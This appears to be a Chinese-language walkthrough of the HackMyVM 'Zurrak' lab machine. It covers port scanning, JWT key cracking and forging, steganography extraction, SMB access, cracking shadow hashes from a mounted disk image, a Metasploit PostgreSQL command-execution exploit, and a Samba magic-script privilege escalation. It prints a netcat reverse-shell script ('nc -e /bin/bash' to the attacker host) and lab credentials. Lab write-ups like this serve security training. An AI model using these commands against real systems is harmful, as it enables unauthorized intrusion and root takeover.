[HackMyVM]靶场Zurrak

难度:medium

kali:192.168.56.104

靶机:192.168.56.140

端口扫描

# nmap -sV -A 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-30 16:59 CST
Nmap scan report for 192.168.56.140
Host is up (0.00039s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
| http-title: Login Page
|_Requested resource was login.php
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
5432/tcp open  postgresql  PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after:  2033-10-17T19:29:16
| fingerprint-strings: 
|   SMBProgNeg: 
|     SFATAL
|     VFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
|     Fpostmaster.c
|     L2195
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=3/30%Time=6607D461%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:62:31:5D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Host script results:
| smb2-time: 
|   date: 2024-03-30T16:59:18
|_  start_date: N/A
|_clock-skew: 7h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.56.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

开启了 80 139 445 5432 四个端口没有22

先smb枚举一下

# enum4linux 192.168.56.140
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 30 17:03:12 2024

 =========================================( Target Information )=========================================                                                                                     
                                                                                               
Target ........... 192.168.56.140                                                              
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.140 )===========================                                                                                     
                                                                                               
                                                                                               
[E] Can't find workgroup/domain                                                                
                                                                                               
                                                                                               

 ===============================( Nbtstat Information for 192.168.56.140 )===============================                                                                                     
                                                                                               
Looking up status of 192.168.56.140                                                            
No reply from 192.168.56.140

 ==================================( Session Check on 192.168.56.140 )==================================                                                                                      
                                                                                               
                                                                                               
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

无果

浅扫一下目录

# gobuster dir -u http://192.168.56.140   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 1270] [--> login.php]
/.html                (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 2041]
/admin.php            (Status: 302) [Size: 2625] [--> login.php]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.56.140/vendor/]
/index_.php           (Status: 200) [Size: 200]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 346965 / 1323366 (26.22%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347585 / 1323366 (26.27%)
===============================================================
Finished
===============================================================

可以看到有login admin index_ 几个文件估计是要登录

去web看一下

一个朴素的登录界面，源码里给了账号密码

username:internal@zurrak.htb && password:testsite

登录上一片空白，看源码

自动跳转回index.php

想起目录扫描出来一个index_.php去看

乍一看以为base64其实是jwt

暂时不知道有什么用

回到index.php,抓包发现cookie里面有token也是一个jwt，解析一下

这次不一样了，多一个isAdmin参数

那就爆破jwt，用jwt_tools

爆破出来key是TEST123

然后伪造jwt

利用这个token去admin.php

please don't ever use these images for file transfers!!!

把隐写提示甩脸上了

在第三个图片隐写了一个exe文件

# stegseek zurrakhearts.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""

[i] Original filename: "asli.exe".
[i] Extracting to "zurrakhearts.jpg.out".

放到ida64反编译

转化成字符串发现是ilovecats

有密码了，但是没有用户名，猜测是exe文件名asli

尝试smb连接

┌──(root㉿kali2)-[~/Desktop]
└─# smbclient //192.168.56.140/share -U asli --password ilovecats
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Oct 21 05:14:00 2023
  ..                                  D        0  Sat Oct 21 04:36:51 2023
  DONTDELETE                          D        0  Sat Oct 21 11:44:44 2023
  operations                          D        0  Sat Oct 21 12:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 13:30:09 2011
  human_resources                     D        0  Sun Apr  2 13:30:09 2017
  launch_options.txt                  N       21  Wed Dec 14 11:55:16 2022

                9232860 blocks of size 1024. 6208916 blocks available

连接成功(后面我都不会，看着wp做的，也记录一下)

从\operations\New folder\deploy\3\latest\approved 目录下载zurrak.old.vmdk

从\operations 跳转到New folder可以用cd "New folder"，不然有空格挂载不了

┌──(root㉿kali2)-[~/Desktop]
└─# qemu-system-x86_64 -hda zurrak.old.vmdk -display gtk,show-cursor=on

挂在一个这个虚拟镜像

输入c进入grub模式

输入 cat (hd0,1)/etc/shadow可以看到root和postgres的密码

md我不知道该如何下载到我的kali上，这里先不说，继续

将root和postgres用john爆破

得到postgres数据库的密码是baller15

然后用msf的exp

msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from t
                                                 able (For Debugging)
   PASSWORD           baller15         no        The password for the specified usern
                                                 ame. Leave blank for a random passwo
                                                 rd.
   RHOSTS             192.168.56.140   yes       The target host(s), see https://docs
                                                 .metasploit.com/docs/using-metasploi
                                                 t/basics/using-metasploit.html
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          BTgo9XNkX6n      yes       A table name that does not exist (To
                                                  avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.104   yes       The listen address (an interface may be specifie
                                     d)
   LPORT  4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

[-] Handler failed to bind to 192.168.56.104:4567:-  -
[-] Handler failed to bind to 0.0.0.0:4567:-  -
[-] 192.168.56.140:5432 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4567).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.56.104:4567 
[*] 192.168.56.140:5432 - 192.168.56.140:5432 - PostgreSQL 15.3 (Debian 15.3-0+deb12u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
[*] 192.168.56.140:5432 - Exploiting...
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n created successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n copied successfully(valid syntax/command)
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully(Cleaned)
[*] 192.168.56.140:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.56.104:4567 -> 192.168.56.140:54666) at 2024-03-30 18:58:11 +0800

配置一下password lhost lport rhost然后run就能拿到shell

我习惯反弹到kali上

postgres@zurrak:/var/lib/postgresql/15/main$ whoami
postgres
postgres@zurrak:/var/lib/postgresql/15/main$ ls
base          pg_multixact  pg_stat      PG_VERSION            postmaster.pid
global        pg_notify     pg_stat_tmp  pg_wal
pg_commit_ts  pg_replslot   pg_subtrans  pg_xact
pg_dynshmem   pg_serial     pg_tblspc    postgresql.auto.conf
pg_logical    pg_snapshots  pg_twophase  postmaster.opts
postgres@zurrak:/var/lib/postgresql/15/main$ cd /home
postgres@zurrak:/home$ ls -al
total 12
drwxr-xr-x  3 root     root     4096 Oct 20 19:06 .
drwxr-xr-x 18 root     root     4096 Oct 20 15:22 ..
drwxr-xr-x  2 postgres postgres 4096 Oct 24 18:03 postgres
postgres@zurrak:/home$ cd postgres
postgres@zurrak:/home/postgres$ ;s
bash: syntax error near unexpected token `;'
postgres@zurrak:/home/postgres$ ls
emergency.sh  user.txt
postgres@zurrak:/home/postgres$ cat user.txt
fe8f97f109ceb0362c95e60338c4c1a8
postgres@zurrak:/home/postgres$

很不容易地拿到了user flag

还有一个emergency.sh文件

然后传linpeas跑一下

postgres@zurrak:/home/postgres$ wget http://192.168.56.104:6677/linpeas.sh
--2024-03-30 15:04:13--  http://192.168.56.104:6677/linpeas.sh
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 808.76K  --.-KB/s    in 0.02s   

2024-03-30 15:04:13 (51.9 MB/s) - ‘linpeas.sh’ saved [828172/828172]

postgres@zurrak:/home/postgres$ ls
emergency.sh  linpeas.sh  user.txt
postgres@zurrak:/home/postgres$ chmod +x linpeas.sh
postgres@zurrak:/home/postgres$ ./linpeas.sh

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                         
UUID=86e74abe-2367-4664-8041-b897fb803a6d /               ext4    errors=remount-ro 0       1                     
UUID=68b2a8a8-27f9-4255-9e14-180abd1261c4 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

//127.0.0.1/internal    uid=emre, pw=daily666

发现一个本地smb

看一下smb配置文件

#cat /etc/samba/smb.conf 
...
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no

[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli

[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh

127.0.0.1的smb会执行emergency.sh脚本，那么我们劫持一下然后反弹shell


postgres@zurrak:/home/postgres$ cat emergency.sh
#!/bin/bash
nc -e /bin/bash 192.168.56.104 4444
#smbclient \\\\127.0.0.1/internal -U emre%daily666 -c "put emergency.sh"

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.140] 40948
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
bash_history
root.txt
cat root.txt
66fce7650a88ac2afd99d061e1c6a4df

照葫芦画瓢也是拿到了root权限。medium，哎我太菜了。